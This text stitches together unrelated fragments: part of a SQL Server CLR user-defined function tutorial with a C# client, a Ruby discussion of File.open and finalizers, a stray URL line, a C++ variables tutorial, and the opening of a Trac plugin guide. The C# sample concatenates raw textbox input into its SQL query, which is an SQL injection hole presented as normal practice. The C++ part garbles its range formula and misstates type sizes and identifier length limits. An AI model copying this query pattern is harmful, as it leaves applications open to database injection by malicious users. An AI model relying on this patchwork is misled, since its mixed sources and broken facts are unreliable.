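-- Bind a T-SQL function to the static method inside the assembly.
CREATE FUNCTION dbo.GetUserNameByID(@id int) RETURNS nvarchar(50)
AS EXTERNAL NAME UDFExamples.UserDefinedFunctions.GetUserNameByID;
GO

-- Quick smoke test before wiring up a client application.
SELECT dbo.GetUserNameByID(1);
```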
Testing the User-Defined Function Using a Windows Forms Application
In this example, you will test the function from a Windows Forms client application created using Visual C#. (See the following screenshot.) Name the project UDFExamplesClientApp.
Next, add a label control, a textbox control, and a command button to the form. In the Click event of the command button, add the following lines of code:
```csharp
private void btnInvoke_Click(object sender, EventArgs e)
{
    using (SqlConnection connection = new SqlConnection())
    {
        using (SqlCommand command = new SqlCommand())
        {
            connection.ConnectionString =
                @"Server=(local)\SQLExpress;Integrated Security=True;Database=Test;Pooling=False";
            // Set the SqlCommand object's properties
            command.CommandType = CommandType.Text;
            string userID = txtUserID.Text;
            command.CommandText = "SELECT dbo.GetUserNameByID(" + userID + ")";
            command.Connection = connection;
            connection.Open();
            DataSet userNameDataSet = new DataSet();
            SqlDataAdapter adapter = new SqlDataAdapter(command);
            adapter.Fill(userNameDataSet);
            string userName = (string)userNameDataSet.Tables[0].Rows[0][0];
            lblResult.Text = userName;
        }
    }
}
```
With the above code, you do the following:
- Create an instance of SqlConnection in a using block and then create the SqlCommand object.
- Set the ConnectionString property of the SqlConnection object to a valid connection string. (Because you are using the SQL Server Express that is supplied with Visual Studio 2005, you specify integrated authentication in the connection string.)
- Set the CommandType property of the SqlCommand object to CommandType.Text to indicate that you want to execute a SQL statement.
- Set the CommandText property to the name of the user-defined function. (To the user-defined function, you also supplied the value entered by the user in the textbox as an argument.)
- Create instances of the DataSet and SqlDataAdapter objects. (To the constructor of the SqlDataAdapter object, you also supplied the previously created SqlCommand object as an argument.)
- Execute the user-defined function by invoking the Fill method of the SqlDataAdapter object.
Once the user-defined function is executed and the dataset populated with the results of the query execution, you then can retrieve the result by navigating through the DataTable that is contained in the DataSet object.
If you execute the above code and click the command button, you will see the following screen. The label control displays the user name returned by the user-defined function.
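You can also sanity-check the function straight from a T-SQL query window before involving the client application. This is a hypothetical smoke test that assumes the Test database contains a Users row with ID 1:

```sql
-- Hypothetical call to the deployed UDF (assumes a Users row with ID = 1)
SELECT dbo.GetUserNameByID(1) AS UserName;
```

If this returns the expected name, any remaining problems are on the client side (connection string, parameter passing) rather than in the function itself.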
Choosing Between T-SQL and Managed Code
When writing stored procedures, triggers, and user-defined functions, programmers now will have to decide whether to use traditional T-SQL or a .NET language such as Visual Basic .NET or C#. The correct decision depends upon the particular situation. In some cases, you should use T-SQL; in others, you should use managed code.
T-SQL is best in situations where the code will mostly perform data access with little or no procedural logic. Managed code is best suited for CPU-intensive functions and procedures that feature complex logic, or where you want to leverage the .NET Framework's Base Class Library. Code placement is another important fact to consider. You can run both T-SQL and in-process managed code on the server. This functionality places code and data close together, and allows you to take advantage of the processing power of the server.
On the other hand, you may wish to avoid placing processor-intensive tasks on your database server. Most client machines today are very powerful, and you may wish to take advantage of this processing power by placing as much code as possible on the client. While T-SQL code cannot run on a client machine, the SQL Server in-process provider was designed to be as similar as possible to client-side managed ADO.NET, enhancing the portability of code between server and client.
From T-SQL to Managed Code
With the release of SQL Server 2005 Beta 2, database programmers can now take advantage of the rich functionality of the .NET Base Class Library and the CLR. By using CLR integration, you can create your user-defined functions using the .NET language of your choice. This will allow you to utilize the .NET Framework, which provides thousands of classes and methods on the server side. Many tasks that were awkward or difficult to perform in T-SQL now can be easily accomplished using managed code.
It's common knowledge in most programming languages that the flow for working with files is open-use-close. Yet I have seen unmatched File.open calls many times in Ruby code, and moreover I found this gem of knowledge in the Ruby docs:
I/O streams are automatically closed when they are claimed by the garbage collector.
I saw many times in ruby codes unmatched
File.open calls
Can you give an example? I only ever see that in code written by newbies who lack the "common knowledge in most programming languages that the flow for working with files is open-use-close".
Experienced Rubyists either explicitly close their files, or, more idiomatically, use the block form of
File.open, which automatically closes the file for you. Its implementation basically looks something like this:
```ruby
def File.open(*args, &block)
  return open_with_block(*args, &block) if block_given?
  open_without_block(*args)
end

def File.open_without_block(*args)
  # do whatever ...
end

def File.open_with_block(*args)
  f = open_without_block(*args)
  begin
    yield f
  ensure
    f.close
  end
end
```
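A small sketch of what the block form buys you in practice (the file name is arbitrary; it is written to the system temp directory):

```ruby
require "tmpdir"

# The block form closes the handle automatically when the block exits,
# even if the block raises -- no explicit close needed.
path = File.join(Dir.tmpdir, "block_form_demo.txt")
File.open(path, "w") { |f| f.puts "hello" }   # closed on block exit

contents = File.open(path) { |f| f.read }     # read, then auto-closed
handle   = File.open(path) { |f| f }          # the handle escapes, but is closed
puts contents          # => "hello\n"
puts handle.closed?    # => true
```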
Scripts are a special case. Scripts generally run so short, and use so few file descriptors that it simply doesn't make sense to close them, since the operating system will close them anyway when the script exits.
Do we need to explicitly close?
Yes.
If yes then why does the GC autoclose?
Because after it has collected the object, there is no way for you to close the file anymore, and thus you would leak file descriptors.
Note that it's not the garbage collector that closes the files. The garbage collector simply executes any finalizers for an object before it collects it. It just so happens that the
File class defines a finalizer which closes the file.
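User code can attach the same kind of finalizer via `ObjectSpace.define_finalizer`. The sketch below is purely illustrative -- this is not how `File` is implemented internally, and finalizer timing is entirely up to the GC:

```ruby
require "tmpdir"

# Illustrative only: close a wrapped IO when the wrapper is collected.
class AutoClosingFile
  def initialize(path)
    @io = File.open(path, "w")
    io = @io   # the finalizer proc must not capture `self`,
               # or the object would never become collectable
    ObjectSpace.define_finalizer(self, proc { io.close unless io.closed? })
  end

  def write(text)
    @io.write(text)
  end
end

path = File.join(Dir.tmpdir, "finalizer_demo.txt")
AutoClosingFile.new(path).write("hi")
GC.start   # may or may not run the finalizer right away
puts File.exist?(path)   # => true
```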
If not then why the option?
Because wasted memory is cheap, but wasted file descriptors aren't. Therefore, it doesn't make sense to tie the lifetime of a file descriptor to the lifetime of some chunk of memory.
You simply cannot predict when the garbage collector will run. You cannot even predict if it will run at all: if you never run out of memory, the garbage collector will never run, therefore the finalizer will never run, therefore the file will never be closed. | https://codedump.io/share/vQLUqX3BqwKk/1/ruby39s-fileopen-and-the-need-for-fclose | CC-MAIN-2017-39 | refinedweb | 373 | 66.74 |
Week 11 - Output Devices
An I2C based Pump controller using a Attiny44!
Contents
- Contents
- Principle
- Design
- Testing the board:
Principle
In this week’s assignment I will work on a pump driver controlled by an I2C-based Attiny. This module will be part of my Final Project and will be used to recirculate the test gases in order to provide with a flow over the installation.
The pump I will be using is an AIRPO D2028B: a vacuum pump driven by a 12V / 12W DC motor:
Image Source: Abra Electronics
The pump is driven at 12V and it will be using a power supply available at the lab with a DC barrel power jack. However, in order to switch the pump on and off, I will be complicating things a little bit and using a MOSFET driven by an Attiny44. Also, as happened in the previous week, this will all be controlled by a Raspberry Pi, and the voltage levels have to be taken into account, so that the I2C communication is able to run at 3.3V and the Attiny can interface with the MOSFET running the pump.
MOSFETs
MOSFET stands for Metal-Oxide-Semiconductor Field Effect Transistors and they are a type of transitor commonly used in power electronics. Before jumping into the hardware implementation, I will detail here what I have learned about them.
How a MOSFET works is quite interesting thanks to the physics of semiconductors. Semiconductors are an intermediate case between conductive materials (mainly metals) and insulators. How semiconductors function is described very nicely in this link and, even if I won't repeat everything from there here, I think it is important to understand that the real magic of semiconductors in electronics occurs when they are doped: with either an excess or a shortage of electrons, they become a different type of material and their conductivity changes drastically. They are called N-type when doped negatively (with extra electrons) and P-type when doped positively (with electrons removed, i.e. with holes added).
Moving electrons between N- and P-type areas can be easy or tricky, depending on the direction they go: from N-type to P-type areas is easy, and it is very difficult the other way around. This property is key for transistors in general and is the base of how they work.
In more detail, a MOSFET is a combination of three layers: N-P-N (with a P-type layer sandwiched between two N-types) or P-N-P (with an N-type sandwiched between two P-types). The NPN arrangement is normally called N-channel and the PNP one P-channel. In the case of the N-channel, there is a layer of insulating material attached to the P-type semiconductor part, and attached to it we find the so-called GATE. On the other sides (the N terminals) we have the so-called DRAIN and SOURCE, the latter also connected to the non-insulated side of the GATE.
Image Source: Concise electronics for geeks
When we apply voltage to the GATE of an NPN, we attract electrons to the GATE side of the P-type material, leaving a positive charge on the opposite side. This creates a channel between the two N-type layers (I assume that's where N-channel comes from). Ideally, the larger the voltage we apply to the GATE, the larger the amount of electrons we can have in the channel and therefore the lower the resistance, meaning the MOSFET is ON. This means that if 0V is applied to the GATE, electrons will not gather in the P-type material, the resistance will be too high, and it will effectively create an open circuit, meaning the MOSFET is OFF.
This last part defines two very important parameters: the necessary voltage to turn ON the MOSFET and its resistance during that operation. The voltage is normally specified as the Drive Voltage (or Vgs) and the resistance is normally specified as RDS(on). The latter is indeed very important, because the power dissipated by the MOSFET will be P = I^2 * R, and the larger the resistance is, the more heat there is to dissipate. Interestingly, this depends on the voltage applied to the gate, and the minimum threshold is specified by Vgs(th).
Just to compile some more information about MOSFETS, it is important to know that they can either work as a normally-on or a normally-off switch. These are called depletion type or enhacement type and they are marked as a continuous or a dotted line between DRAIN and SOURCE:
Image Source: Electronics tutorials
Where to put the MOSFET
Unluckily for me, the lab didn't have a reasonably small N-channel MOSFET at the time I did this assignment, so I had to decide whether to use a P-channel type or a bigger N-channel, which was probably a bit overkill. In order to answer those questions, I reviewed this document, this site, this other one and these videos (btw, these are very explanatory):
The option using the P-channel is not that immediate for an electronics newbie like me: the P-channel MOSFET will have to run on the HIGH SIDE of the circuit and it will be easily triggered ON whenever a voltage below the Drive voltage (VDD = 12VDC in my case) is applied to the gate. However, in order to turn OFF the MOSFET, it would need at least the VDD voltage, which in my case is not available in the circuit by itself, since the Attiny runs at 5V tops. Another option is to use an N-channel MOSFET driven by a lower GATE voltage which outputs to the GATE of a P-channel MOSFET. In this situation, the N-channel MOSFET can be driven by a lower GATE voltage (for example coming from the Arduino) and it will pull down the GATE of the P-channel MOSFET below VDD. When the N-channel MOSFET is turned OFF, the GATE of the P-channel MOSFET will be switched back to VDD and the MOSFET will turn OFF.
This last option is interesting, but it wouldn’t make much sense for me to do it if I have to use the same N-channel MOSFET to run a P-channel MOSFET, when the N-channel MOSFET is so big that I could do the job by only using it on the LOW SIDE of the circuit.
Having said that, now the question is: since the Raspberry Pi runs the I2C at 3.3V and the big N-channel MOSFET has its minimum RDS(on) at 5V, will the MOSFET get too warm when there is 1A running through it in normal operation? Put differently, are the 3.3V of the Pi enough to run the MOSFET in a safe condition?
To be honest, I didn’t realise about this problem until I had built the board. Nevertheless, in case this isn’t safe, the board can either be redesigned in order to run at 5V on the MOSFET side with a level shifter, or the Raspberry Pi Hat can be redesigned so that the 5V are downshifted in the SDA and SCL lines. Although this is a weird combination of Power vs I2C levels in the hat and needs to be rethought.
Design
For the design of this board I used KiCad. The schematics of the board, including an indicating LED, an ISP, the above mentioned MOSFET and a power connector is below:
The I2C connector is the same as the one done in the previous assignment, but this time with some more room for the legs to have some soldering to attach to. For the pump, I measured the terminals and created my own footprint for it:
The Pads in this case are made as through-hole, defined like:
In the case of the Motor, I added a flyback Diode and a current limiting resistor for when the Pump is turned off, following this schema:
Finally, I added a 10kΩ pull down resistor in the MOSFET GATE in order to easily turn the MOSFET OFF.
Routing
The final PCB routing looks like:
Note that I added a hole for the shaft in the PCB and two small holes under the barrel power jack for the location pins it has underneath.
Then, I moved on to fab.modules on the Modela MDX-20 in the lab, using the following PNGs for the traces (in this same order):
For the Inner cuts:
For the Jack Holes:
And finally the outer cut:
The final board result, with all the components soldered in it looks like:
Testing the board:
I will be using a very simple blink-LED sketch to test the board initially, following the same procedure to write the fuses and set up the CLK divider as seen in the previous week.
```cpp
#include <Arduino.h>

// Sensor and Indicator Led Pins
#define LED 0
#define PUMP 1

// Variables for the pressure sensor
int _delay = 1000;

void setup() {
  pinMode(LED, OUTPUT);
  pinMode(PUMP, OUTPUT);
  digitalWrite(PUMP, LOW);

  //
  // set clock divider to /1
  //
  CLKPR = (1 << CLKPCE);
  CLKPR = (0 << CLKPS3) | (0 << CLKPS2) | (0 << CLKPS1) | (0 << CLKPS0);
}

void loop() {
  digitalWrite(PUMP, LOW);
  digitalWrite(LED, HIGH);
  delay(_delay);
  digitalWrite(LED, LOW);
  delay(_delay);
}
```
This working, I moved on to checking how the MOSFET runs at 3.3V and seeing if it gets hot with the pump in the loop, but with no connection to the Raspberry Pi I2C:
```cpp
void loop() {
  digitalWrite(PUMP, HIGH);
  digitalWrite(LED, HIGH);
  delay(_delay);
  digitalWrite(LED, LOW);
  delay(_delay);
}
```
This makes the MOSFET have a 3Ω resistance, which might be OK for it to dissipate the heat.
Then, using a power supply from the lab I tried to turn ON and OFF the pump during 10s, with a hardcoded delay:
```cpp
digitalWrite(LED, HIGH);
digitalWrite(PUMP, HIGH);
delay(_delay);
digitalWrite(LED, LOW);
digitalWrite(PUMP, LOW);
delay(_delay);
```
And then… some mistakes!
Mistake #1
I wired the barrel connector wrongly. In my power supply, the inner pin (pin 1 below) is +VDC and the outer part of the barrel is -VDC. The barrel connector has three contacts though:
From this link: The pin 3 serves as a detector for when you insert the plug. When this happens the connection between pins 3 and 2 breaks. This is useful for cutting a battery out of the circuit when a DC adapter is plugged in. In this way, the battery is protected from two unwanted actions: discharging, and being charged. Also, this can be used for building a circuit which detects the insertion of the DC plug. For instance, when the 3-2 connection breaks, some microcontroller I/O pin could be pulled up to VCC, and then the firmware knows that the device is on an adapter.
Therefore, the connection to ground should be done also on the Pin 2, instead on pin 3, or on both, since I have no intention to detect the conection of the barrell connector:
On the first version of this board (see below for more details)
Mistake #2
When I mounted the PCB onto the pump and turned it on, it began to work erratically.
I ran some tests on the board and initially I thought it could be that the MOSFET was inducing some sort of current into the microcontroller through the GATE. To check, I tried adding a resistor in the line:
But this sadly didn’t solve the problem. Then, I was recommended by Esteban to remove the board from the top of the pump since it could be provoking some magnetic interference, or maybe the vibrations from the pump itself:
And it worked! I have done this video to show how the pump works:
I tried to reenact the problem by moving the board back on top of the pump, but I didn’t succeed. The pump’s magnetic field apparently is not a problem on its own, but maybe it is more the vibrations of the pump and probably some bad soldering I have done.
I have done a more robust version for this board below, with the following changes:
- Add an LED in the GATE line (bad idea)
- Add a GND copper zone around the circuit
- Wider traces (0.6mm for the power and 0.3mm for the microcontroller)
The V2.0 is below, but for now, you can see the Frankenstein board that resulted from the test:
And a final note! The MOSFET opens at 3.3V without any problem, and it does not get warm at all, even if the resistance goes up to 2Ω when operated like that.
Corrections and V2.0
The new board, with the corrections from above, working at either 3.3V or 5V to trigger the MOSFET gate:
And the new PCB routing, with a copper zone layer for the GND in which I could try to reduce the magnetic fields:
Here I detail the Copper Zone Properties in KiCad. I followed this tutorial for this purpose:
Then, here are the new PNGs for the TRACES:
The inner cuts (almost the same):
The outer cuts:
And the final board after milling!
Mistake (again…)
And of course, yet another mistake: apparently the LED drops the gate voltage to a level where it's not able to turn ON the MOSFET when powering the circuit at 3.3V. The only purpose of this item was to have a nice glow when running the MOSFET at different PWM levels, but I had to remove it for simplicity. I replaced it with a 560Ω resistor and the 2.2kΩ with a jumper.
spiff Wrote:that being said, you can probably have your property, i'll have to check that we have a dedicated localized string for it.
Hitcher Wrote:Thanks, all good here
```python
def getFeelsLike( T=10, V=25 ):
    """
    The formula to calculate the equivalent temperature related to the wind chill is:
    T(REF) = 13.12 + 0.6215 * T - 11.37 * V**0.16 + 0.3965 * T * V**0.16
    Or:
    T(REF): is the equivalent temperature in degrees Celsius
    V: is the wind speed in km/h measured at 10m height
    T: is the temperature of the air in degrees Celsius
    source:
    """
    FeelsLike = T
    # Wind speeds of 4 mph or less: the wind chill temperature is the same as the actual air temperature.
    if round( ( V + .0 ) / 1.609344 ) > 4:
        FeelsLike = ( 13.12 + ( 0.6215 * T ) - ( 11.37 * V**0.16 ) + ( 0.3965 * T * V**0.16 ) )
    return str( round( FeelsLike ) )

# test FeelsLike and check against the table on the site
tCelsius = -10
for windspeed in range( 101 ):
    FeelsLike = getFeelsLike( tCelsius, windspeed )
    print FeelsLike
print "-"*100
```
```python
import math

def getDewPoint( Tc=0, RH=93, minRH=( 0, 0.075 )[ 0 ] ):
    """
    Dewpoint from relative humidity and temperature.
    If you know the relative humidity and the air temperature, and want to
    calculate the dewpoint, the formulas are as follows.
    """
    # First, if your air temperature is in degrees Fahrenheit, then you must
    # convert it to degrees Celsius by using the Fahrenheit to Celsius formula.
    # Tc = 5.0 / 9.0 * ( Tf - 32.0 )
    # The next step is to obtain the saturation vapor pressure (Es) using this
    # formula as before when air temperature is known.
    Es = 6.11 * 10.0**( 7.5 * Tc / ( 237.7 + Tc ) )
    # The next step is to use the saturation vapor pressure and the relative
    # humidity to compute the actual vapor pressure (E) of the air. This can be
    # done with the following formula.
    # RH = relative humidity of air expressed as a percent, or fall back to the
    # minimum (0.075) humidity to avoid a math domain error with math.log.
    RH = RH or minRH #0.075
    E = ( RH * Es ) / 100
    # Note: math.log( ) means to take the natural log of the variable in the parentheses.
    # Now you are ready to use the following formula to obtain the dewpoint temperature.
    try:
        DewPoint = ( -430.22 + 237.7 * math.log( E ) ) / ( -math.log( E ) + 19.08 )
    except ValueError:
        # math domain error, because RH = 0%
        #return "N/A"
        DewPoint = 0 #minRH
    # Note: Due to the rounding of decimal places, your answer may be slightly
    # different from the above answer, but it should be within two degrees.
    return str( int( DewPoint ) )

# Check against the Dew Point Calculator with
tCelsius = 10
for humidity in range( 101 ):
    DewPoint = getDewPoint( tCelsius, humidity )
    print DewPoint
print "-"*100
```
odoll Wrote:hm, not here - maybe blind, but I just dl'ed the latest win32 nightly build XBMCSetup-20111116-57ba0cb-master.exe
Weather is gone from the main menu; however, going to System -> Weather OR System Add-Ons there's no "Weather add-on" to pick?!
Searching Add-Ons for Weather just returns "MEdia sources - DMI TV Vejrudsigt".
Hitcher Wrote:You may need to Force Refresh XBMCs repository for it to show up.
bcamp929 Wrote:No Fahrenheit? | http://forum.xbmc.org/showthread.php?tid=114637&pid=937146 | CC-MAIN-2014-35 | refinedweb | 514 | 65.52 |
icetGetColorBuffer, icetGetDepthBuffer -- retrieve the last computed color or depth buffer.
```c
#include <GL/ice-t.h>

GLubyte *icetGetColorBuffer( void );
GLuint  *icetGetDepthBuffer( void );
```
Returns a buffer containing the result of the image composition performed by the last call to icetDrawFrame. Be aware that a color or depth buffer may not have been computed with the last call to icetDrawFrame. IceT avoids the computation and network transfers for any unnecessary buffers unless specifically requested otherwise with the flags given to the icetInputOutputBuffers function. Use a call to icetGetBooleanv with a value of ICET_COLOR_BUFFER_VALID or ICET_DEPTH_BUFFER_VALID to determine whether either of these buffers is available. Attempting to get a nonexistent buffer will result in a warning being emitted and NULL returned.
icetGetColorBuffer returns the color buffer for the displayed tile. Each pixel value can be assumed to be four consecutive bytes in the buffer. The pixels are also always aligned on 4-byte boundaries. The format of the color buffer is defined by the state parameter ICET_COLOR_FORMAT, which is typically either GL_RGBA, GL_BGRA, or GL_BGRA_EXT. icetGetDepthBuffer returns the depth buffer for the displayed tile. Depth values are stored as 32-bit integers. The width and the height of the buffer are determined by the width and the height of the displayed tile at the time icetDrawFrame was called. If the tile layout is changed since the last call to icetDrawFrame, the dimensions of the buffer returned may not agree with the dimensions stored in the current IceT state. The memory returned by icetGetColorBuffer and icetGetDepthBuffer need not, and should not, be freed. It will be reclaimed in the next call to icetDrawFrame. Expect the data returned to be obliterated on the next call to icetDrawFrame.
None.
ICET_INVALID_VALUE The appropriate buffer is not available, either because it was not computed or it has been obliterated by a subsequent IceT computation.
The returned image may have a value of (R, G, B, A) = (0, 0, 0, 0) for a pixel instead of the true background color. This can usually be corrected by replacing all pixels with an alpha value of 0 with the background color. The buffers are stored in a shared memory pool attached to a particular context. As such, the buffers are not copied with the state. Also, because they are shared, it is conceivable that the buffers will be reclaimed before the next call to icetDrawFrame. If this should happen, the ICET_COLOR_BUFFER_VALID and ICET_DEPTH_BUFFER_VALID state variables will be set accordingly.

SEE ALSO: icetDrawFrame(3), icetInputOutputBuffers(3), icetGet(3)

IceT Reference, February 14, 2008, icetGetColorBuffer(3)
What is this
A tool to help the conversion from UnityScript -> C#
You can read more about in this blog post.
How to use
First, download the tool from here.
Before running the conversion tool:
Backup your project
Keep in mind that you'll have best results (i.e, a smoother conversion process) if your UnityScripts have #pragma strict applied to them.
Launch Unity editor (preferably 5.6.x) and make sure you allow APIUpdater to run and update any obsolete API usages. This is necessary to avoid compilation errors during the conversion.
The next step is to run the application (UnityScript2CSharp.exe), passing the path to the project (-p), the Unity root installation folder (-u) and any additional assembly references (-r) used by the UnityScript scripts. Below you can find a list of valid command line arguments and their meaning:
Example:
UnityScript2CSharp.exe -p m:\Work\Repo\4-0_AngryBots -u M:\Work\Repo\unity\build -r "m:\AngryBot Assemblies\Assembly-CSharp.dll" "m:\AngryBot Assemblies\Assembly-UnityScript.dll" -s UNITY_ANDROID,UNITY_EDITOR
Limitations
Some comments may not be preserved or be misplaced.
Guarded code (#if … )
- UnityScript parser simply ignores guarded code when the condition evaluates to false leaving no traces of the original code when we are visiting the generated AST. The alternative for now is to run the tool multiple times in order to make sure all guarded code will eventually be processed. Each time the tool is executed user is required to merge the generated code manually.
Formatting is not preserved
UnityScript.Lang.Array (a.k.a Array) methods are not fully supported. We convert such type to object[] (this means that if your scripts relies on such methods you'll need to replace the variable declarations / instantiation with some other type (like List, Stack, etc) and fix the code.
Type inference in anonymous function declarations are inaccurate in some scenarios and may infer the wrong parameter / return type.
Local variable scope sometimes gets messed up due to the way UnityScript scope works.
Types with hyphens in the name (like This-Is-Invalid) are converted as as-it-is but they are not valid in C#
Missing return values are not injected automatically (i.e, in a non-void method, a bare return; statement will cause a compilation error in the converted code)
Automatic conversion from object to int/long/float/bool etc is not supported (limited support for int -> bool conversion in conditional expressions is in place though).
for( init; condition; increment) is converted to while
Methods with same name as the declaring class (invalid in C#) are converted as-it-is
Invalid operands to as operators (which always yield null in US) are considered errors by the C# compiler.
Equality comparison against null used as statement expressions generate errors in C# (eg: foo == null;) (this code in meaningless, but harmless in US)
Code that changes foreach loop variable (which is not allowed in C#) are converted as-is, which means the resulting code will not compile cleanly.
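As a hypothetical before/after for the `for`-to-`while` point above (illustrative only, not literal tool output):

```
// UnityScript (before):
//     var sum = 0;
//     for (var i = 0; i < 3; i++) {
//         sum += i;
//     }

// Converted C# (after) -- the init / condition / increment parts are
// split around a while loop:
int sum = 0;
int i = 0;
while (i < 3)
{
    sum += i;
    i++;
}
```

The behavior is equivalent, but note that `continue` statements inside such a converted loop would skip the increment, which is one reason to review these loops by hand.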
Not supported features
- Property / Event definition
- Macros
- Literals
  - Regular expressions
- Exception handling
Note that any unsupported language construct (a.k.a, AST node type), will inject a comment in the converted source including the piece of code that is not supported and related source/line information.
How to build
In case you want to build the tool locally, "all" you need to do is:
- Clone the repository
- In a console, change directory to the cloned repo folder
- Restore nuget packages (you can download nuget here) -- run nuget.exe restore
- Build using msbuild -- msbuild UnityScript2CSharp.sln /target:clean,build
How to run tests
All tests (in UnityScript2CSharp.Tests.csproj project) can be run with NUnit runner (recommended to use latest version).
Windows
If you have Unity installed most likely you don't need any extra step; in case the tests fail to find Unity installation you can follow steps similar to the ones required for OSX/Linux
OSX / Linux
The easiest way to get the tests running is by setting the environment variable UNITY_INSTALL_FOLDER to point to the Unity installation folder and launching the NUnit test runner.
Q: During conversion, the following error is shown in the console:
"Conversion aborted due to compilation errors:"
And then some compiler errors complaining about types not being valid.
A: You are missing some assembly reference; if the type in question is define in the project scripts it is most likely Assembly-CSharp.dll or Assembly-UnityScript.dll (just run the conversion tool again passing -r path_to_assembly_csharp path_to_assembly_unityscript as an argument.
Q: Some of my UnityScript code is not included in the converted CSharp
A: Most likely this is code guarded by SYMBOLS. Look for #if / #else directives in the original UnityScript and run the conversion tool passing the right symbols. Note that in some cases one or more symbols may introduce mutually exclusive source snippets which means that no matter if you specify the symbol or not, necessarily some region of the code will be excluded, as in the example:
#if !SYMBOL_1 // Snippet 1 #endif #if SYMBOL_1 // Snippet 2 #endif
In the example above, if you run the conversion tool specifying the symbol SYMBOL_1 , Snippet 1 will be skipped (because it is guarded by a !SYMBOL_1) and Snippet 2 will be included. If you don't, Snippet 1 will be included but Snippet 2 will not (because SYMBOL_1 is not defined).
The best way to work around this limitation is to set up a local VCS repository (git, mercurial or any other of your choice), run the conversion tool with one set of symbols and commit the generated code, then revert the changes to the UnityScript scripts (i.e, restore the original scripts), run the conversion tool again with a different set of symbols and merge the new version of the converted scripts.
Q: The conversion fails with exceptions about failures to find Unity types
A: During the development process we observed some errors like that when referencing assemblies from Unity 2017.1/2017.2.
Please, try to reference Unity assemblies from Unity 5.6.x (i.e, pass the path to the Unity 5.6 installation as the command line argument **-u**).
Variables in C++
Variables are names for memory locations in the computer where we can store data of certain types. They are an important component of any programming language. In C++, each variable has a type, which defines the kind of value the variable can store, the size it occupies and its range. Some basic types of variables in C++ are int, float, bool, char, etc.
- Variable Declaration in C++
- Rules for Naming Variable
- Data types of Variables
- Pointer Variables
- Reference Variables
- Scope of a Variable
Variable Declaration in C++
In C++, variables must be declared before use. Declaring a variable tells the compiler that a variable of a certain type is being used in the program. Using a variable before declaring it will cause an error. Variables can be declared in C++ as follows:
datatype variable_name; For e.g. int x;
Similarly, values can be assigned to variables as follows:
variable_name = value; For e.g. x = 9;
The declaration and assignment statement can be combined into a single statement as follows:
datatype variable_name = value; For e.g. int x = 9;
Any number of variables can be declared in a single statement also as follows:
datatype var1, var2, ... ,varN; For e.g. char x, y, z, ... , m;
Rules for Naming Variable
- Variable name can't be a C++ keyword. For e.g. int can't be a variable name as it is a C++ keyword.
- Variable name must start with an alphabet (A-Z and a-z) or underscore ( _ ) sign. For e.g. var, X, _name, etc are valid variable names but 1a, $age, etc are invalid variable name.
- Variable names can have alphabet (A-Z and a-z), underscore ( _ ), digits (0-9) but can't have other symbols such as %, &, @ , etc. For e.g. a_01, findSum are valid variables name but name&, calc% are not allowed in C++.
- The name of variable can be of any length but only first 31 characters are significant.
Some valid variable names are: db_password, _age, calcPercent, x, etc.
Some invalid variable names are: 1user, %1age, v@lue, !!, *name*, etc.
Data types of variables
Data types defines what type of data a variable can store. In C++, data type of a variable should be defined during declaration. The declaration statement informs the compiler about the type of data the variable can hold and memory required to store it. The basic data types available in C++ are
- bool: It holds boolean value i.e. true(1) or false(0).
- char: It holds character such as alphabet, digits, special characters.
- wchar_t: It can hold 16 bit wide characters and are used to represent languages that have more than 255 characters. Example, Japanese.
- int: It holds integer values such as 5, -100, 359, etc.
- float: It holds floating point numbers such as 101.56, 200.00, -4.589, etc
- double: It also holds floating point numbers but have more precision than float.
Modifiers such as signed, unsigned, long and short can be used before int and char data types to modify them according to our need. For example, if we are writing program to check if a number is prime or not, we can declare the number as unsigned int since prime numbers are always positive integer.
The following table shows the size and range of basic data types used in C++.
Range of a data type = 0 to 2n-1 (for signed) and 2n-1 to 2n-1-1 (for unsigned and with no prefix).
Note: The size of data type can be known by using sizeof() operator as sizeof(float). Some modern compilers such as CodeBlocks shows the size of integer as 4 bytes. However according to ANSI C++ standard its size is 2 bytes only.
Pointer variables
Normal C++ variables stores data and occupy certain memory in the computer. Pointer is a variable that store the address of other variable of same type i.e. a integer pointer will store the address of integer variable. Pointer can be declared using '*' sign as,
datatype * ptr; For e.g. float *fptr;
Assigning address to pointer variables
ptr = &variable_name; For e.g. int x = 5; int *p = &x; // address of x value of p
Reference variables
A reference variable is an alternative name for a previously defined variable. A reference variable must be initialized at the time of declaration. For example, if a is made reference of b, then a and b can be used interchangeably to represent that variable.
Syntax for creating reference variable
datatype &reference_variable = variable_name;
For example,
int xyz = 10; int & abc = xyz;
Here abc is a reference variable for xyz. abc can be used as alternative for xyz. Both refer to the same data in memory. If value of one variable is changed, value of another variable is also changed.
For example,
abc = 5;
This statement will change the value of both abc and xyz to 5.
Scope of a Variable
Scope is a certain module of a program such as function, class or namespace. A scope of a variable is a region in which it is visible and can be accessed. Based on the scope of variable, a variable is of two types:
- Local variables
- Global variables
1. Local variables
Variables that are declared inside a module and can only be used within the module are called local variables. They can't be used outside the block in which they are declared.
Example 1: C++ program to create and use local variable
#include<iostream> #include<conio.h> using namespace std; int main() { int a,b; // local variables a=5; b=6; cout<<"a*b = "<<a*b; getch(); return 0; }
Output
a*b = 30
2. Global variables
Variables that are declared outside all modules and can be accessed and assigned by all the functions in the program are called global variables. The life time of a global variable is same as the life time of the program where it is declared.
Example 2: C++ program to create and use global variable
#include<iostream> #include<conio.h> using namespace std; int g; // global variable void test() { cout<<"Inside test"<<endl; cout<<"g = "<<g<<endl; } int main() { g=25; cout<<"Inside main"<<endl; cout<<"g = "<<g<<endl; test(); getch(); return 0; }
Output
Inside main g = 25 Inside test g = 25 | https://www.programtopia.net/cplusplus/docs/variables | CC-MAIN-2019-30 | refinedweb | 1,051 | 72.36 |
Contents
Plugin Development Guide
This page documents some best practices and guidelines for plugin development. It is a community driven document, and everyone is encouraged to contribute to it. If you have questions or comments, please raise them on the Trac-dev MailingList.
Licensing
Plugin authors are encouraged to clearly indicate how the contribution is licensed. This is important for both users and future developers of your plugin, because if you choose to no longer support the plugin, the terms under which someone else can adopt and develop it are clear. minimise restrictions on future use of the code. Trac has adopted the BSD 3-Clause license, and use of the same license in any plugin code is encouraged. One of the many benefits to adopting this license is that any plugin code can be integrated into the Trac core.
The following steps are suggested to add a license:
- Add the
licensekeyword in
setup.py(example).
- Add a license header to every Python source file (example).Note: For an executable file such as
# -*- coding: utf-8 -*- # # Copyright (C) YYYY-YYYY your name here <your email here> # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution.
setup.py, the header will follow the line
#!/usr/bin/env python(example).
